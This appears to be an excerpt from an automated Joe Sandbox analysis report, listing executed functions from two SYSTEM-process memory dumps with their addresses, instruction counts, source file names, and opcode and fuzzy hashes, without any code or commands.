                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: db507c7d9d91839bda4b9b6d772320e08532d34f74233be6f1fbb32f3048e1f6
                                                                          • Instruction ID: 5b311b719d4311c62e3557edcba60e57104e89c78571dce2d164934466d5f9bb
                                                                          • Opcode Fuzzy Hash: db507c7d9d91839bda4b9b6d772320e08532d34f74233be6f1fbb32f3048e1f6
                                                                          • Instruction Fuzzy Hash: 19217932F0EB890FE751A77C98655347BE0DF96211B0906FAE889C71F7EC59AD428381

                                                                          Executed Functions

                                                                          Function 00007FFD9B771038 Relevance: .4, Instructions: 420COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0a04570020801e0eafe27f28b8451ce7bb27cefac5c9bad545e5d43ee0cfb3f5
                                                                          • Instruction ID: 7229eec706facfaba01ba41cce2a9a547bd2ae114955df7968a96631baca8cd9
                                                                          • Opcode Fuzzy Hash: 0a04570020801e0eafe27f28b8451ce7bb27cefac5c9bad545e5d43ee0cfb3f5
                                                                          • Instruction Fuzzy Hash: 67C10826B196194FD768F7B8A4B5AFD7BA1EF84324B4405BAE04EC71E7DE187801C780
                                                                          Function 00007FFD9B771B2D Relevance: .2, Instructions: 191COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cc2b70e2f57ec557b0ebaff883a9fbc96f863cc221d4d421dce8fe468ef26f6c
                                                                          • Instruction ID: caa9fa17041155311f67c8bf7250644dcab86fe7e9d37383e0818fe6bb0fac02
                                                                          • Opcode Fuzzy Hash: cc2b70e2f57ec557b0ebaff883a9fbc96f863cc221d4d421dce8fe468ef26f6c
                                                                          • Instruction Fuzzy Hash: C351FC20B1E6C94FD79AAB7848B46657FE5DF87219B0801FBE089C76E7ED485806C342
                                                                          Function 00007FFD9B770AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 9N_^
                                                                          • API String ID: 0-1737749909
                                                                          • Opcode ID: da136017c0fb8b31b0a5474b3bee2cbfd42214b16d853d192e7cfbf8c3e93c1b
                                                                          • Instruction ID: d16ae4752bbea3dca82e8a3cd7d26fda121a7329ccb1735be5dd3dd0b02fa01c
                                                                          • Opcode Fuzzy Hash: da136017c0fb8b31b0a5474b3bee2cbfd42214b16d853d192e7cfbf8c3e93c1b
                                                                          • Instruction Fuzzy Hash: 3A615C3AB0962A4FDB14B7BCA4615FC7BA2EF94325B0406B6E01DC71E7CE68744687D0
                                                                          Function 00007FFD9B770E8E Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4N_^
                                                                          • API String ID: 0-2516135240
                                                                          • Opcode ID: 18918ed6946aa2ec2e5cec66e01f59ff966080df96eb71fa58fe1010717112d0
                                                                          • Instruction ID: 3a4e14df55e031e2e9e92986c6208c711c2e7124cf2557f2ce88456a7908e721
                                                                          • Opcode Fuzzy Hash: 18918ed6946aa2ec2e5cec66e01f59ff966080df96eb71fa58fe1010717112d0
                                                                          • Instruction Fuzzy Hash: 72515A21B0E78A0FE756AB7C58655B93FE1EF86224B0901FBE08DC71E7DD189846C352
                                                                          Function 00007FFD9B770985 Relevance: .3, Instructions: 346COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4ee9b66bc865c7f015ba8568bed263cdf7a03cfddbcda895bae09397d0a5d6ba
                                                                          • Instruction ID: 3590ac9e1bccdd6c513fb77d6b1a85cb120e647cd8ae44438e88fd1aa0b5d910
                                                                          • Opcode Fuzzy Hash: 4ee9b66bc865c7f015ba8568bed263cdf7a03cfddbcda895bae09397d0a5d6ba
                                                                          • Instruction Fuzzy Hash: E1A1373B708A268FD715BBBCB8616ED7BA1EF95375B0401B7D149CB1D3CA24644687C0
                                                                          Function 00007FFD9B7709D3 Relevance: .3, Instructions: 320COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ba887d4c8bce2bf769fa93d00fec1492ef15fbaabf3ec66c0ecc16194373b303
                                                                          • Instruction ID: 818e224eb1fcb19f8b00cc622695ba7f69da3543a5c8ebb6e537bcd4099d39f2
                                                                          • Opcode Fuzzy Hash: ba887d4c8bce2bf769fa93d00fec1492ef15fbaabf3ec66c0ecc16194373b303
                                                                          • Instruction Fuzzy Hash: FA91492BB08A2A8FD704BBBCB8656ED7BA1EF84375B0445B7D149CB1D7CE24644687C0
                                                                          Function 00007FFD9B770A08 Relevance: .3, Instructions: 305COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 974f41cd2ed60ac17d1c5bd0a1d2731855c1ceb7e2bc15d82fa7b71386948336
                                                                          • Instruction ID: 73ac09bcbd6f061d30c5cf8d5b1991a058ca767a25d75f66e8f78957d5e8496c
                                                                          • Opcode Fuzzy Hash: 974f41cd2ed60ac17d1c5bd0a1d2731855c1ceb7e2bc15d82fa7b71386948336
                                                                          • Instruction Fuzzy Hash: 6381583BB08A2A8ED704BBBCB8656ED7BA1EF84375B0445B7D149CB1D7CE24644687C0
                                                                          Function 00007FFD9B770A10 Relevance: .3, Instructions: 301COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c986a43b83a04f587350817d28192db839403fc202241f0ca5136489c3e99708
                                                                          • Instruction ID: effc17d9b2d497f5440974a2de121145c5b09f657fca3f4fa3600cd5e3443404
                                                                          • Opcode Fuzzy Hash: c986a43b83a04f587350817d28192db839403fc202241f0ca5136489c3e99708
                                                                          • Instruction Fuzzy Hash: 8781483BB08A2A8ED704BBBCB8656ED7BA1EF84375B0441B7D149CB1D7CE24644687C0
                                                                          Function 00007FFD9B770A48 Relevance: .3, Instructions: 270COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8cca5d978d3f41a5911526e94aea662f6895a15f4d356aae3f546a9af1d952b2
                                                                          • Instruction ID: d2086d34d62b60d8b89ab949bd3701a5b6b7ff11add42de5978f91327bf1cc9f
                                                                          • Opcode Fuzzy Hash: 8cca5d978d3f41a5911526e94aea662f6895a15f4d356aae3f546a9af1d952b2
                                                                          • Instruction Fuzzy Hash: 0471273BB08A2A8ED704BBBCB8656ED7BA1EF94365B0405B7D149CB1D7CE246446C7C0
                                                                          Function 00007FFD9B7707D3 Relevance: .2, Instructions: 151COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5bc62e893a454ca386c8d1602d91921de5f6e5da735a19638e4a762792370a35
                                                                          • Instruction ID: 14a619646e53af324fcae1cd5c39469f413b64e7602f00d0417d78871d63d1f9
                                                                          • Opcode Fuzzy Hash: 5bc62e893a454ca386c8d1602d91921de5f6e5da735a19638e4a762792370a35
                                                                          • Instruction Fuzzy Hash: 2141323AB5D6890FD30AF7A8A4B48ED3F71AF8521074845F6E08A8B3DBDD287405C791
                                                                          Function 00007FFD9B770638 Relevance: .1, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 92b19fcee0a7dd896b7e83931ddb2a3d52cdc05c1ada32a6f925a4092ca145a1
                                                                          • Instruction ID: a0ad59261c589d60a7e7bce320ec85fbcc7348c4e8d4a06b4b00acbf168db336
                                                                          • Opcode Fuzzy Hash: 92b19fcee0a7dd896b7e83931ddb2a3d52cdc05c1ada32a6f925a4092ca145a1
                                                                          • Instruction Fuzzy Hash: 8D31C621B18A494FE79CEB6C44A9679B6D2EF98305F0505BEE01EC36EBDD64AC018341
                                                                          Function 00007FFD9B770D21 Relevance: .1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 90d2b99621a070dc7bfad1a651b43be142db69abc21a6ca6c0138763555a4743
                                                                          • Instruction ID: aba25846dc1aae268e6f1817f898d3ebe6c1ccd209de6bdd07cbd55dd4a31d2a
                                                                          • Opcode Fuzzy Hash: 90d2b99621a070dc7bfad1a651b43be142db69abc21a6ca6c0138763555a4743
                                                                          • Instruction Fuzzy Hash: E031E811B19A490FEB44BBBC58697BDB6D2EF98711F1502BAF00DC32D7DD6868018782
                                                                          Function 00007FFD9B770BD3 Relevance: .1, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44e1eee7af09c41316d67b03b4118855686b911e5096ec380f957810ac6c2647
                                                                          • Instruction ID: dcdcb2d2132341edaa6f691ec9165b750ab74800049f007380712be5b4345386
                                                                          • Opcode Fuzzy Hash: 44e1eee7af09c41316d67b03b4118855686b911e5096ec380f957810ac6c2647
                                                                          • Instruction Fuzzy Hash: C841D434B19A0D4FDB48EBA898756EDBBB2FF98300F5405B9E019D32D6CD28B901C780
                                                                          Function 00007FFD9B770838 Relevance: .1, Instructions: 104COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 436703d0c663e128a407e1680c5f02346b6ca7789ed14bb52e22802e81c825fb
                                                                          • Instruction ID: f6432567d21f6f4805fcc5a8d750ba88e8bdb10653c8c01c154714bf876267f1
                                                                          • Opcode Fuzzy Hash: 436703d0c663e128a407e1680c5f02346b6ca7789ed14bb52e22802e81c825fb
                                                                          • Instruction Fuzzy Hash: 46210635768A494FD359EB6894B48EC7F71FF85200B8445E5E00AC73DBDD28B800C791
                                                                          Function 00007FFD9B771CE1 Relevance: .1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000010.00000002.2346299068.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_16_2_7ffd9b770000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bbe085acb155cf66c15c14911bff2cfaffa05b8f1a90494d56668b334851fd95
                                                                          • Instruction ID: d76514f7f88f87c22ede8cac4cea568c48915e9be415aa10256ddf01fdaa6174
                                                                          • Opcode Fuzzy Hash: bbe085acb155cf66c15c14911bff2cfaffa05b8f1a90494d56668b334851fd95
                                                                          • Instruction Fuzzy Hash: 87216E22F0DB890FE751A77C58A55747BE0DF96310B0906FAE489C71F7DC54AD418781

                                                                          Executed Functions

                                                                          Function 00007FFD9B781038 Relevance: .4, Instructions: 411COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000012.00000002.2906082803.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_18_2_7ffd9b780000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: df9a7bcb910f7456facd4b7f5500a56a53160a432e4e754dab758cb5ec60ec02
                                                                          • Instruction ID: 5499b3d84973989974eab3a9ebcd91da0aa9e1faafb76f0819240ff0fbd1aff9
                                                                          • Opcode Fuzzy Hash: df9a7bcb910f7456facd4b7f5500a56a53160a432e4e754dab758cb5ec60ec02
                                                                          • Instruction Fuzzy Hash: 68C10926B19A5D4FD754B7B8A4B5AFD3B61EF85321F4402BAE00EC71E7DE286841C780
                                                                          Function 00007FFD9B780E8E Relevance: 2.7, Strings: 2, Instructions: 198COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000012.00000002.2906082803.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_18_2_7ffd9b780000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4M_^$A
                                                                          • API String ID: 0-2335568910
                                                                          • Opcode ID: 24fb2aab411571a3217210c8da6b0c50f8760e0aab9380ae0d600961bf98df00
                                                                          • Instruction ID: 89123a96833a61a05780c60a26a81f815b520f941fe24386656904166cc12a34
                                                                          • Opcode Fuzzy Hash: 24fb2aab411571a3217210c8da6b0c50f8760e0aab9380ae0d600961bf98df00
                                                                          • Instruction Fuzzy Hash: 93515921B0DA8A0FE396A77C98659B93BE1DF86225B0941FBE08CC71E7DD1C58438352
                                                                          Function 00007FFD9B780AD3 Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000012.00000002.2906082803.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_18_2_7ffd9b780000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 9M_^
                                                                          • API String ID: 0-1708477388
                                                                          • Opcode ID: 9a78d16f66ffdc499a36b022db27d07340b1cce845824ab186b27d5683670f51
                                                                          • Instruction ID: 8ebaa2d942c6bf4046033f29cf39473b0e0ec95d0ca1f9307ce28647937b05bf
                                                                          • Opcode Fuzzy Hash: 9a78d16f66ffdc499a36b022db27d07340b1cce845824ab186b27d5683670f51
                                                                          • Instruction Fuzzy Hash: 64612D2AB4A91E8ED704B7BCE4619FC77A2EF94325B1403B6E01DC72E7CE3464458790
                                                                          Function 00007FFD9B780985 Relevance: .3, Instructions: 346COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000012.00000002.2906082803.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_18_2_7ffd9b780000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee1f4284ecb84d887607ce1bd7a4904efc928a48d98526adbf4269cfbcea25de
                                                                          • Instruction ID: 6bbe6b8613283604111cf4d0c1142ff8803f79f84a6a9d6d9751b97691c027a9
                                                                          • Opcode Fuzzy Hash: ee1f4284ecb84d887607ce1bd7a4904efc928a48d98526adbf4269cfbcea25de
                                                                          • Instruction Fuzzy Hash: 77A1142BB0996E8ED704BB7CA8615FD7BA1EF95326B0403F7D149CA197CE246046CBD0
                                                                          Function 00007FFD9B7809D3 Relevance: .3, Instructions: 320COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000012.00000002.2906082803.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_18_2_7ffd9b780000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8f541f193da81aab5249ceaaf63357c28b3c940b033cc71cca4c5189dda676ea
                                                                          • Instruction ID: 76f1882ec441b28b44c79a313ee40d1ae6b9835b7256f48e61de59607a6cbc14
                                                                          • Opcode Fuzzy Hash: 8f541f193da81aab5249ceaaf63357c28b3c940b033cc71cca4c5189dda676ea
                                                                          • Instruction Fuzzy Hash: 6091052BB0991E8ED704BB7CB4619FD7BA1EF95336B4443B7D049CA197CE24604687D0
                                                                          Function 00007FFD9B780A08 Relevance: .3, Instructions: 305COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000012.00000002.2906082803.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_18_2_7ffd9b780000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 273aeaa92f904e251d4b984ad2713247e5785677a1a9dade34849cfb27fed671
                                                                          • Instruction ID: 2997580e5374cc66cabd38a8300c085208393a8ef18191b28c52e4139b60c95d
                                                                          • Opcode Fuzzy Hash: 273aeaa92f904e251d4b984ad2713247e5785677a1a9dade34849cfb27fed671
                                                                          • Instruction Fuzzy Hash: AB81F62BB0991E8ED704BB7CB4619FD7BA1EF95325B0443B7E049C61D7CE2464468BC0
                                                                          Function 00007FFD9B780A10 Relevance: .3, Instructions: 301COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000012.00000002.2906082803.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_18_2_7ffd9b780000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 840e2a861146c7ea459ce11bb7511c7cf881c1976101e46790eb990d67b09d7a
                                                                          • Instruction ID: 900271dcee89c9956e5b183ac488c665199b17c82f7df20270373f070f49c926
                                                                          • Opcode Fuzzy Hash: 840e2a861146c7ea459ce11bb7511c7cf881c1976101e46790eb990d67b09d7a
                                                                          • Instruction Fuzzy Hash: 4281052BB0991E8ED704BB7CB461AFD7BA1EF95326B0443B7E049C61D7CE2464468BC0
                                                                          Function 00007FFD9B780A48 Relevance: .3, Instructions: 270COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000012.00000002.2906082803.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_18_2_7ffd9b780000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c332e8e67092f5573f82c93b422ea58b5b4c62f236534afed8ec864a356837a
                                                                          • Instruction ID: d75902f16a896f8ce6a44786afab7d839358c8eb891d621d235286d653960b4f
                                                                          • Opcode Fuzzy Hash: 6c332e8e67092f5573f82c93b422ea58b5b4c62f236534afed8ec864a356837a
                                                                          • Instruction Fuzzy Hash: 3571172BB0991E8ED704BB7CE861AED7BA1EF95325B1403B6E049C71D7CE246046CBC0
                                                                          Function 00007FFD9B7807D3 Relevance: .1, Instructions: 148COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000012.00000002.2906082803.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_18_2_7ffd9b780000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d41ef6777e97f1d9f852ca5ee5e2fcb6ebdde0b005ec19dc1c280e6036f6344
                                                                          • Instruction ID: e53354a51bd5f13c4c91e88e6e9e1de095cc37c009cb07f0d402de0ca38ee2b4
                                                                          • Opcode Fuzzy Hash: 6d41ef6777e97f1d9f852ca5ee5e2fcb6ebdde0b005ec19dc1c280e6036f6344
                                                                          • Instruction Fuzzy Hash: B141232AB5E6C90ED345B7ACE070DEC7F72AF8521078841F6E09A873DBDE282844C741
                                                                          Function 00007FFD9B780D21 Relevance: .1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000012.00000002.2906082803.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_18_2_7ffd9b780000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3a626f0a6e2891fc67fe0349b7ce8b805b58d8dfd8f067c2185ede8fc19bf9f2
                                                                          • Instruction ID: c158d61edc7981bc765ab285f5bccf7d25b608428729b678b45f9b640bbdfb98
                                                                          • Opcode Fuzzy Hash: 3a626f0a6e2891fc67fe0349b7ce8b805b58d8dfd8f067c2185ede8fc19bf9f2
                                                                          • Instruction Fuzzy Hash: ED31C711B19E4D0FE754BBBC58696BD77D2EF98711F1503BAE00DC31D6DD2868018741
                                                                          Function 00007FFD9B780BD3 Relevance: .1, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000012.00000002.2906082803.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_18_2_7ffd9b780000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8096c5bd7d0e881aae163b78227b59845ea9027ba77b335d499163527bf46fcb
                                                                          • Instruction ID: 80922a7f8ab5163f0162be0318af8cf9277530490e39831e72643073bf702f70
                                                                          • Opcode Fuzzy Hash: 8096c5bd7d0e881aae163b78227b59845ea9027ba77b335d499163527bf46fcb
                                                                          • Instruction Fuzzy Hash: 09418235B19A4D4FDB84EBA8D875AEDBBB2EF98301F5406B5E009D32D6CE386801C740
                                                                          Function 00007FFD9B780838 Relevance: .1, Instructions: 104COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000012.00000002.2906082803.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_18_2_7ffd9b780000_SYSTEM.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 388f87c5a30f118c8fcbfee058ab7a3681b0dbc836a78359e52a8baa8ca71a55
                                                                          • Instruction ID: 6f559fbb71f6b6b4d0ad582a1cdf216006458b75ee38628a319978e4e480c223
                                                                          • Opcode Fuzzy Hash: 388f87c5a30f118c8fcbfee058ab7a3681b0dbc836a78359e52a8baa8ca71a55
                                                                          • Instruction Fuzzy Hash: B421A035A5AA8D4FD385EB6CD4B0DADBF72AF85201B8845E5E01AC33DADE286900C751